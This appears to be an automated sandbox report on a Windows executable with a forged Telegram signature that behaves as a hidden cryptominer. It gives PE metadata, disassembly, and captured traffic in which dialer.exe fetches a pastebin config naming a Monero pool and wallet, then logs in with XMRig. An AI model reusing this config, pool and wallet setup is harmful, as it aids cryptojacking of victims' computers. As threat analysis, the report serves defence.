                                                      TLSH:3446231B91DAC294D4928DBC3FA562D222B848C2D7474C177EF220EDF3469D92C9E4F6
                                                      File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........,S.....@..........@.............................PT...........`........................................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x671214ED [Fri Oct 18 07:57:33 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:3b819c3dfb34bc24b00db0746b529d11

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 29/07/2022 08:15:36 29/07/2025 08:15:36
                                                      Subject Chain
                                                      • E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
                                                      Version:3
                                                      Thumbprint MD5:D26432F60E2A3BBEB3537B78CB826828
                                                      Thumbprint SHA-1:71AB79E1C8FF155838C37A5299AE215C52BF6D1D
                                                      Thumbprint SHA-256:BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
                                                      Serial:7AE2B5021371F092A904B6FA

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00009ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007FB838FBC82Fh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00009EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FB838FBC850h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007FB838FBC84Bh
                                                      dec esp
                                                      mov esi, dword ptr [0000D649h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FB838FBC827h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007FB838FBC809h
                                                      dec eax
                                                      mov edi, dword ptr [00009E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FB838FBC82Eh
                                                      mov ecx, 0000001Fh
                                                      call 00007FB838FC5EC4h
                                                      jmp 00007FB838FBC849h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007FB838FBC82Bh
                                                      mov byte ptr [0053BE91h], 00000001h
                                                      jmp 00007FB838FBC83Bh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00009E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00009E7Bh]
                                                      call 00007FB838FC5EBBh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FB838FBC83Bh
                                                      dec eax
                                                      mov ecx, dword ptr [00009E50h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe4d80x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5430000x350.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5400000x1a4.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x53cc000x2b08.data
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5440000x78.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xb0a00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4100x138.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0xe6900x178.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x9a260x9c00a09ceffdcbbefa0748f83151ae976101False0.4896083733974359data6.123705642740087IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0xb0000x3cc80x3e00c90ead9b71877dbcd6070f00f8d87db4False0.5096396169354839data4.660252854018388IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xf0000x530e480x52e2000e89761bc0fe80b2684687e92d00b3f5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x5400000x1a40x200f5877d18c8075c8f97b7ee916aa91eefFalse0.525390625data3.362838094708458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg0x5410000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls0x5420000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x5430000x3500x400a5ea00b82ddb864dd7e907200b12fbc7False0.3642578125data2.8181232842112682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x5440000x780x200605bd4c1917d91de7185a066a49c6d83False0.23046875data1.421534345329436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x5430600x2f0SysEx File - IDPEnglishUnited States0.449468085106383

                                                      Imports

                                                      DLLImport
                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _time64, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, rand, signal, srand, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-18T23:09:19.985310+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4534401.1.1.153UDP
                                                      2024-10-18T23:09:21.281682+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.449736142.202.242.43443TCP
                                                      2024-10-18T23:09:21.900075+02002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1104.20.4.235443192.168.2.449735TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 18, 2024 23:09:20.067085981 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:20.067127943 CEST44349734142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:20.067214012 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:20.067629099 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:20.067643881 CEST44349734142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:20.637411118 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:20.637506008 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:20.637595892 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:20.661993980 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:20.662029028 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:20.716703892 CEST44349734142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:20.807923079 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:21.274916887 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.276652098 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.276710987 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.278826952 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.278997898 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.281270981 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.281384945 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.281549931 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.281568050 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.464221001 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.899538994 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.899801016 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.899885893 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.902266026 CEST49735443192.168.2.4104.20.4.235
                                                      Oct 18, 2024 23:09:21.902287006 CEST44349735104.20.4.235192.168.2.4
                                                      Oct 18, 2024 23:09:21.927555084 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:21.927586079 CEST49734443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:21.927860975 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:21.927897930 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:21.928039074 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.146163940 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.146193027 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:22.802798033 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:22.838592052 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.838618994 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:22.842504025 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:22.842595100 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.843755007 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.843962908 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:22.917280912 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:22.917299986 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:23.104809046 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:23.104866028 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:23.214195967 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:35.290678978 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:35.401876926 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:09:57.350405931 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:09:57.401884079 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:10:19.300110102 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:10:19.417439938 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:10:41.300472975 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:10:41.417684078 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:11:01.091958046 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:11:01.208410978 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:11:03.313231945 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:11:03.417546034 CEST49736443192.168.2.4142.202.242.43
                                                      Oct 18, 2024 23:11:25.317512989 CEST44349736142.202.242.43192.168.2.4
                                                      Oct 18, 2024 23:11:25.402070045 CEST49736443192.168.2.4142.202.242.43

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 18, 2024 23:09:19.985310078 CEST5344053192.168.2.41.1.1.1
                                                      Oct 18, 2024 23:09:20.004615068 CEST53534401.1.1.1192.168.2.4
                                                      Oct 18, 2024 23:09:20.627815008 CEST5584653192.168.2.41.1.1.1
                                                      Oct 18, 2024 23:09:20.635647058 CEST53558461.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 18, 2024 23:09:19.985310078 CEST192.168.2.41.1.1.10x284eStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                      Oct 18, 2024 23:09:20.627815008 CEST192.168.2.41.1.1.10x8104Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 18, 2024 23:09:20.004615068 CEST1.1.1.1192.168.2.40x284eNo error (0)pool.hashvault.pro142.202.242.43A (IP address)IN (0x0001)false
                                                      Oct 18, 2024 23:09:20.004615068 CEST1.1.1.1192.168.2.40x284eNo error (0)pool.hashvault.pro142.202.242.45A (IP address)IN (0x0001)false
                                                      Oct 18, 2024 23:09:20.635647058 CEST1.1.1.1192.168.2.40x8104No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                      Oct 18, 2024 23:09:20.635647058 CEST1.1.1.1192.168.2.40x8104No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                      Oct 18, 2024 23:09:20.635647058 CEST1.1.1.1192.168.2.40x8104No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • pastebin.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449735104.20.4.2354437784C:\Windows\System32\dialer.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-18 21:09:21 UTC114OUTGET /raw/f2EfCEn0 HTTP/1.1
                                                      Accept: */*
                                                      Connection: close
                                                      Host: pastebin.com
                                                      User-Agent: cpp-httplib/0.12.6
                                                      2024-10-18 21:09:21 UTC388INHTTP/1.1 200 OK
                                                      Date: Fri, 18 Oct 2024 21:09:21 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      x-frame-options: DENY
                                                      x-content-type-options: nosniff
                                                      x-xss-protection: 1;mode=block
                                                      cache-control: public, max-age=1801
                                                      CF-Cache-Status: MISS
                                                      Last-Modified: Fri, 18 Oct 2024 21:09:21 GMT
                                                      Server: cloudflare
                                                      CF-RAY: 8d4b82487e7a2e64-DFW
                                                      2024-10-18 21:09:21 UTC487INData Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 70 6f 6f 6c 2e 68 61 73 68 76 61 75 6c 74 2e 70 72 6f 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 38 42 74 50 37 6a 46 6d 32 47 4b 4e 61 36 42 51 4b 6e 45 62 59 74 4d 57 5a 74 65 4a 69 35 4d 6b 64 34 45 6e 31 57 6f 4a 6d 68 4a 74 68 74 5a 73 42 68 43 39 72 79 39 44 78 45 6a 6a 72 74 67 36 71 4e 37 71 4d 32 32 73 6f 6e 69 69 5a 64 32 6d 61 31 70 77 69 75 32 4c 37 50 78 77 72 6d 7a 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 77 6f 72 6b 65 72 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c
                                                      Data Ascii: 1e0{ "algo": "rx/0", "pool": "pool.hashvault.pro", "port": 443, "wallet": "8BtP7jFm2GKNa6BQKnEbYtMWZteJi5Mkd4En1WoJmhJthtZsBhC9ry9DxEjjrtg6qN7qM22soniiZd2ma1pwiu2L7Pxwrmz", "password": "worker", "nicehash": false, "ssl
                                                      2024-10-18 21:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449736142.202.242.434437784C:\Windows\System32\dialer.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-18 21:09:22 UTC597OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 38 42 74 50 37 6a 46 6d 32 47 4b 4e 61 36 42 51 4b 6e 45 62 59 74 4d 57 5a 74 65 4a 69 35 4d 6b 64 34 45 6e 31 57 6f 4a 6d 68 4a 74 68 74 5a 73 42 68 43 39 72 79 39 44 78 45 6a 6a 72 74 67 36 71 4e 37 71 4d 32 32 73 6f 6e 69 69 5a 64 32 6d 61 31 70 77 69 75 32 4c 37 50 78 77 72 6d 7a 22 2c 22 70 61 73 73 22 3a 22 77 6f 72 6b 65 72 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64
                                                      Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8BtP7jFm2GKNa6BQKnEbYtMWZteJi5Mkd4En1WoJmhJthtZsBhC9ry9DxEjjrtg6qN7qM22soniiZd2ma1pwiu2L7Pxwrmz","pass":"worker","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid
                                                      2024-10-18 21:09:22 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 38 64 38 66 35 30 35 65 2d 38 39 30 35 2d 34 33 65 38 2d 39 66 65 66 2d 35 63 32 62 33 61 32 34 36 63 35 66 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 39 63 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 65 38 32 66 65 62 39 38 63 66 35 36 32 38 35 31 38 65 37 39 33 61 31 36 31 63 30 34 35 33 66 30 35 34 61 66 35 38 36 38 37 61 30 38 62 62 64 63 33 34 32 31 61 66 63 34 62 61 39 38 65 61 35
                                                      Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"8d8f505e-8905-43e8-9fef-5c2b3a246c5f","job":{"blob":"1010f99ccbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000e82feb98cf5628518e793a161c0453f054af58687a08bbdc3421afc4ba98ea5
                                                      2024-10-18 21:09:35 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 66 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 36 32 35 63 66 30 63 34 35 30 38 31 39 38 33 64 38 63 36 35 66 64 64 30 37 31 38 34 35 31 36 39 36 32 37 38 65 35 38 30 36 34 38 39 33 65 35 32 63 36 66 35 30 38 30 35 35 36 32 63 33 30 36 66 31 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 39 61 64 34 33 35 33 2d 39 38 34 30 2d 34 30 61 62 2d 62 36 37 37 2d 38 30 63 62 30 64 34 64 31 65 63 30 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108f9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000625cf0c45081983d8c65fdd0718451696278e58064893e52c6f50805562c306f1d","job_id":"c9ad4353-9840-40ab-b677-80cb0d4d1ec0","ta
                                                      2024-10-18 21:09:57 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 35 30 38 35 34 39 39 62 38 31 36 64 63 37 61 65 36 35 30 65 30 37 61 33 39 33 36 31 35 30 38 34 30 61 64 61 36 39 36 65 30 31 38 62 35 39 31 32 61 66 31 36 66 61 34 38 61 39 65 35 31 36 64 33 32 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 30 62 30 61 61 39 39 2d 62 36 65 62 2d 34 30 64 63 2d 61 37 30 65 2d 34 35 38 66 64 65 32 66 36 35 33 66 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a59dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f000000005085499b816dc7ae650e07a3936150840ada696e018b5912af16fa48a9e516d324","job_id":"10b0aa99-b6eb-40dc-a70e-458fde2f653f","ta
                                                      2024-10-18 21:10:19 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 32 32 61 34 64 34 62 31 64 30 39 33 34 66 33 38 66 36 34 35 38 35 37 34 32 62 39 35 38 34 39 37 34 34 35 30 30 32 63 64 33 66 62 31 32 65 31 33 36 30 34 33 34 37 30 34 62 64 33 30 37 34 35 31 32 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 34 33 30 32 66 31 30 2d 63 34 63 39 2d 34 62 39 66 2d 61 65 35 39 2d 66 33 65 37 61 31 38 32 38 30 65 30 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bb9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f0000000022a4d4b1d0934f38f64585742b958497445002cd3fb12e1360434704bd30745128","job_id":"04302f10-c4c9-4b9f-ae59-f3e7a18280e0","ta
                                                      2024-10-18 21:10:41 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 63 34 37 61 66 35 31 38 31 63 33 37 35 39 35 62 64 31 63 63 34 37 63 35 65 66 38 32 61 63 64 30 62 31 30 31 62 62 38 34 35 34 35 61 33 31 63 31 36 39 36 35 37 30 62 36 31 30 35 64 66 65 34 38 32 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 34 62 66 66 33 32 63 62 2d 39 65 35 31 2d 34 64 62 32 2d 62 61 31 64 2d 30 62 32 30 30 61 61 30 31 31 61 62 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d19dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000c47af5181c37595bd1cc47c5ef82acd0b101bb84545a31c1696570b6105dfe482c","job_id":"4bff32cb-9e51-4db2-ba1d-0b200aa011ab","ta
                                                      2024-10-18 21:11:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 64 63 30 61 64 63 39 36 61 31 39 66 35 38 65 36 38 64 63 36 38 32 63 36 62 31 37 39 35 36 66 64 30 33 30 33 64 61 35 37 37 32 65 34 66 62 32 38 34 30 34 36 35 34 65 66 65 38 33 62 35 62 32 65 32 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 61 66 35 30 31 34 33 2d 37 33 65 36 2d 34 33 66 34 2d 62 61 39 30 2d 65 36 30 35 36 38 34 36 66 30 35 32 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d19dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000dc0adc96a19f58e68dc682c6b17956fd0303da5772e4fb28404654efe83b5b2e2c","job_id":"5af50143-73e6-43f4-ba90-e6056846f052","ta
